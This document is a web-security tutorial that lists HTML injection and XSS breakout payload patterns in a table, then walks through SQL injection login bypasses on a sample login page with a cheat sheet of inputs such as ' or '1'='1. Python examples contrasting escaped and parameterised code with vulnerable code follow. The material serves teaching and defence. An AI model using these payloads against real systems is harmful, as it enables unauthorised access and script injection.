HTML injection, also termed "virtual defacement", is one of the simplest and most common vulnerabilities. It arises when a web page fails to sanitize user-supplied input or to validate its output, which lets an attacker craft payloads and inject malicious HTML into the application.
Ending HTML comments with a backtick character. On older versions of Internet Explorer, a backtick character could be used to end an HTML comment and inject otherwise commented-out markup. An HTML filter that allows comments can be bypassed with this trick, allowing an attacker to inject arbitrary HTML.
The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.
In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. It could be anything from a while loop that locks the browser, e.g. `while(1){a=1;}`, to something more useful that a creative attacker comes up with. You can quite easily find "XSS Cheat Sheets" elsewhere. The intent of this reference is to instill a sense of methodology into finding HTML injection vulnerabilities. Good exploits take advantage of HTML syntax and browser quirks in creative ways. Take the time to experiment with simple payloads and observe how (and where) the web application reflects them. Then turn towards the list of complex attacks on a cheat sheet.

Also notice how the syntax of elements and JavaScript has been preserved in cases where single or double quotes are used to prefix a payload. The injected quote prematurely ends a quoted string, which means there will be a dangling quote at the end. Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by adding an extra variable definition with an open quote:

;a='

The dangling quote will close the delimiter and, in most cases, the syntax will be preserved. This type of closure isn't really necessary for an exploit to work, but it's a sign of craftier exploits.
The table’s layout is a bit constrained by the format of this post. Keep an eye on it for updates to content as well as presentation.
Technique | Characters | Payload Example | Injection Example |
---|---|---|---|
Close a start tag in order to insert a new element (This usually happens within an element attribute, but keep in mind HTML comments and XML CDATA.) | > /> --> ]]> | ><script>☣</script> | <input type=text name=id value= ><script>☣</script> > |
Insert an end tag in order to insert a new element (Also useful where XML appears, such as RSS feeds.) | </element> ]]> | ]]><script>☣</script> | <INFO><![CDATA[ ]]><script>☣</script> |
Close a quoted attribute in order to insert an intrinsic event | " (ASCII 0x22) ' (ASCII 0x27) | "onEvent=☣;a=" | <a href="/redir?url=http://" onClick=☣;a=""> |
Break out of a JavaScript variable | " (ASCII 0x22) ' (ASCII 0x27) | ";{☣}var foo=" | <script> var host = window.location; var lastLink = "http://web.site/index?refurl=";{☣}var foo=""; … </script> |
Split payload across multiple reflection points (Also a good way to bypass filters. Use HTML comment delimiters to elide content between the two payloads. In some cases you might be able to use quoted strings to elide content.) | (as above) | 1: "<script<!-- 2: -->>☣</script> | <input value=""<script<!-- ">other content <input value=" -->>☣</script>" |
Alter MIME interpretation of uploaded file (Usually when content is expected to be served as text/plain, binary, or another non-HTML type) | Must be able to influence the Content-Type header or the browser's MIME sniffing algorithm | text/html application/x-javascript | Uploaded file contains JavaScript. Image EXIF data contains HTML & JavaScript. |
Bypass a filter using a browser quirk | Alternate whitespace character; non-standard element or attribute | - | See http://x86.cx/html5/ for an example of a complex src attribute for an img element. |
Bypass a filter using alternate or invalid character encoding (The goal is to find a sequence that disrupts or confuses a parser enough that a character such as ASCII 0x22 is considered part of a multibyte sequence, but is served to the browser as a single-byte character. This would occur either because a server-side filter incorrectly stripped or rewrote the invalid sequence or because the browser's character parser misinterpreted the sequence.) | UTF-7 UTF-8 Unicode | - | %fe%22 %fd%22 %cd%22 %c1%22 %c0%a2 %80%22 %22 |
JavaScript execution in CSS and style definitions [Obsolete for modern browsers due to security concerns] | - | - | IE Expressions, Mozilla -moz-binding |
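As an added example (not code from the original post), the following Python script renders two of the reflection contexts from the table, a quoted attribute value and a JavaScript string literal, with and without context-appropriate encoding. The templates and probe strings are constructed here; a harmless `x=1` stands in for the ☣ placeholder.

```python
import html
import json

# Constructed templates mirroring two reflection points from the table above:
# a quoted attribute value and a JavaScript string literal inside <script>.
ATTR_TEMPLATE = '<a href="/redir?url={value}">link</a>'
SCRIPT_TEMPLATE = '<script>var lastLink = {value};</script>'


def render_attr_unsafe(value):
    # Raw reflection: a " in the input ends the href value early and whatever
    # follows is parsed as further attributes (e.g. an intrinsic event).
    return ATTR_TEMPLATE.format(value=value)


def render_attr_safe(value):
    # quote=True encodes both quote characters, so the attribute cannot be closed.
    return ATTR_TEMPLATE.format(value=html.escape(value, quote=True))


def js_string_literal(value):
    # json.dumps escapes " \ and control characters, which keeps the JavaScript
    # string intact, but it leaves < alone: a value containing </script> would
    # still end the script block at the HTML level. Encode < as \u003c, which
    # the JavaScript parser turns back into < but the HTML parser never sees.
    return json.dumps(value).replace("<", "\\u003c")


def js_literal_round_trips(value):
    # The encoded literal must still decode to the original value.
    return json.loads(js_string_literal(value)) == value


def render_script_unsafe(value):
    return SCRIPT_TEMPLATE.format(value='"' + value + '"')


def render_script_safe(value):
    return SCRIPT_TEMPLATE.format(value=js_string_literal(value))


if __name__ == "__main__":
    # Constructed probes shaped like the table's payload examples.
    attr_probe = 'http://" onClick=x=1;a="'
    script_probe = 'http://web.site/";x=1;var foo="</script><script>x=2</script>'
    for render in (render_attr_unsafe, render_attr_safe):
        print(render(attr_probe))
    for render in (render_script_unsafe, render_script_safe):
        print(render(script_probe))
```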
Login page #1
- Login page with user name and password verification
- Both the user name and password fields are prone to code injection.
Credentials for logging in normally
User name | Password |
---|---|
admin | admin |
tom | tom |
ron | ron |
SQL injection
Executed SQL query when username is tom and password is tom:
SELECT * FROM users WHERE name='tom' and password='tom'

When a user enters a user name and password, a SQL query is created and executed against the database to verify them. The above query searches the users table for a row where name is tom and password is tom. If a matching entry is found, the user is authenticated.

In order to bypass this security mechanism, SQL code has to be injected into the input fields. The code has to be injected in such a way that the SQL statement still produces a valid result when executed. If the executed SQL query has syntax errors, it won't fetch a valid result, so filling in random SQL commands and submitting the form will not always result in successful authentication.

Executed SQL query when username is tom and password is a single quote:

SELECT * FROM users WHERE name='tom' and password='''

The above query is not going to yield any results, as it is not a valid query. If the web page is not filtering out error messages, you will be able to see an error message on the page. The trick is then to make the query valid by putting proper SQL commands in place.

Executed SQL query when username is tom and password is ' or '1'='1:

SELECT * FROM users WHERE name='tom' and password='' or '1'='1'

If the username is already known, the only thing to be bypassed is the password verification, so the SQL commands should be fashioned accordingly.

The password='' or '1'='1' condition is always true, so the password verification never happens. It can also be said that the above statement is more or less equal to

SELECT * FROM users WHERE name='tom'

That is just one of the possibilities. The actual exploit is limited only by the imagination of the tester. Let's see another possibility.

Executed SQL query when username is tom and password is ' or 1='1:

SELECT * FROM users WHERE name='tom' and password='' or 1='1'

The password='' or 1='1' condition is also always true, just like in the first case, and thus bypasses the security.

The above two cases needed a valid username to be supplied. But that is not necessarily required, since the username field is also vulnerable to SQL injection.

Executed SQL query when username is ' or '1'='1 and password is ' or '1'='1:

SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'

The SQL query is crafted in such a way that both username and password verifications are bypassed. The above statement actually queries for all the users in the database and thus bypasses the security.

Executed SQL query when username is ' or ' 1=1 and password is ' or ' 1=1:

SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'

The above query is also more or less similar to the previously executed query and is a possible way to get authenticated.
Cheat sheet
User name | Password | SQL Query |
---|---|---|
tom | tom | SELECT * FROM users WHERE name='tom' and password='tom' |
tom | ' or '1'='1 | SELECT * FROM users WHERE name='tom' and password='' or '1'='1' |
tom | ' or 1='1 | SELECT * FROM users WHERE name='tom' and password='' or 1='1' |
tom | 1' or 1=1 -- - | SELECT * FROM users WHERE name='tom' and password='1' or 1=1 -- -' |
' or '1'='1 | ' or '1'='1 | SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' |
' or ' 1=1 | ' or ' 1=1 | SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' |
1' or 1=1 -- - | blah | SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah' |
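As an added example (not part of the original page), the following Python script loads the login page's three accounts into an in-memory SQLite table and runs the cheat sheet's inputs through both a string-concatenated query, built the way the login page builds it, and a parameterised one. The users table and its two columns are assumed from the queries above; everything else is constructed here.

```python
import sqlite3

# Constructed sample accounts mirroring the login page's credential table.
USERS = [("admin", "admin"), ("tom", "tom"), ("ron", "ron")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_concatenated(conn, name, password):
    """Builds the query as the login page does: the input becomes part of the SQL."""
    query = ("SELECT name FROM users WHERE name='" + name +
             "' and password='" + password + "'")
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.OperationalError as err:
        # e.g. a lone single quote leaves an unterminated string literal
        return query, "error: " + str(err)
    return query, sorted(r[0] for r in rows)


def login_parameterised(conn, name, password):
    """Same lookup with placeholders: the input is only ever compared as data."""
    rows = conn.execute(
        "SELECT name FROM users WHERE name=? and password=?",
        (name, password)).fetchall()
    return sorted(r[0] for r in rows)


def compare(name, password):
    """Returns (query text, concatenated result, parameterised result)."""
    conn = make_db()
    query, concat = login_concatenated(conn, name, password)
    param = login_parameterised(conn, name, password)
    conn.close()
    return query, concat, param


if __name__ == "__main__":
    for creds in [("tom", "tom"), ("tom", "'"), ("tom", "' or '1'='1"),
                  ("' or '1'='1", "' or '1'='1"), ("1' or 1=1 -- -", "blah")]:
        query, concat, param = compare(*creds)
        print(query)
        print("  concatenated:", concat, "\n  parameterised:", param)
```

Note that the injected password returns every account, not just tom's, because SQL evaluates AND before OR; with placeholders the same strings match nothing.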